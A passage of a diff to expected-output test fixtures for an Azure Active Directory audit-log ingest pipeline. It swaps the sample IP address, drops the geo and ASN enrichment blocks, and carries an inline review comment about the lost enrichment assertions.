3b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124999500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -5893,25 +5371,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -5925,7 +5385,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -6061,7 +5521,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": { 
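Review bot: The new `source` object keeps only `"ip": "67.43.156.15"` where the old one also carried `geo` and `as` blocks, so this expectation no longer asserts that the geoip and ASN enrichment produce anything for the supported test address; the same applies to the `source` hunks at @@ -6104 and @@ -6315. If the test stack is meant to resolve the supported IP subset deterministically, the fixture should carry the resulting `source.geo` and `source.as` values instead of omitting them; if pipeline tests intentionally run without geo enrichment, a short note in the test configuration saying so would keep a later regeneration from silently reintroducing real-world lookup data. The pipeline these fixtures exercise is outside this diff, so this is inferred from the expected output alone.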
@@ -6073,12 +5533,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036250100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125003300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"N
ame\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryse
rvice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -6104,25 +5564,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -6136,7 +5578,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -6272,7 +5714,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": { 
